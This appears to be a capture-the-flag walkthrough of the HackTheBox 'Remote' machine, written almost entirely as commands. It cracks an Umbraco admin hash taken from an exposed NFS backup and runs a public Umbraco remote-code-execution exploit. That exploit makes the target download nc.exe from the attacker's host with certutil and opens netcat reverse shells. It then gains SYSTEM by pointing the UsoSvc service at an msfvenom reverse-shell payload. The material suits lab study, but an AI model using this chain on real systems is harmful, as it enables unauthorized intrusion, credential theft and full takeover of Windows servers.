HackTheBox — Remote

nmap -sC -sV -A 10.10.10.180

ftp 10.10.10.180

http://10.10.10.180/

showmount -e 10.10.10.180

mount 10.10.10.180:/site_backups site_backups/

cd App_Data/
strings Umbraco.sdf | grep admin

john hash --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt

https://www.exploit-db.com/exploits/46153

{ string cmd = "/c certutil -urlcache -split -f http://10.10.15.209:8081/nc.exe c:/windows/temp/nc.exe";

python3 46153.py

{ string cmd = "/c c:/windows/temp/nc.exe 10.10.15.209 4442 -e cmd.exe";

python3 46153.py

GET User Flag!

type c:\Users\Public\user.txt

Privilege Escalation

systeminfo

whoami /priv

wmic service where started=true get name, startname

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.209 LPORT=4442 -f exe --platform windows > reverse.exe

certutil -urlcache -split -f http://10.10.15.209:8081/reverse.exe c:/windows/temp/reverse.exe

cd c:\windows\Temp
sc config usosvc binpath="c:\windows\temp\reverse.exe"

sc stop usosvc
sc start usosvc

GET Root Flag!

type C:\Users\Administrator\Desktop\root.txt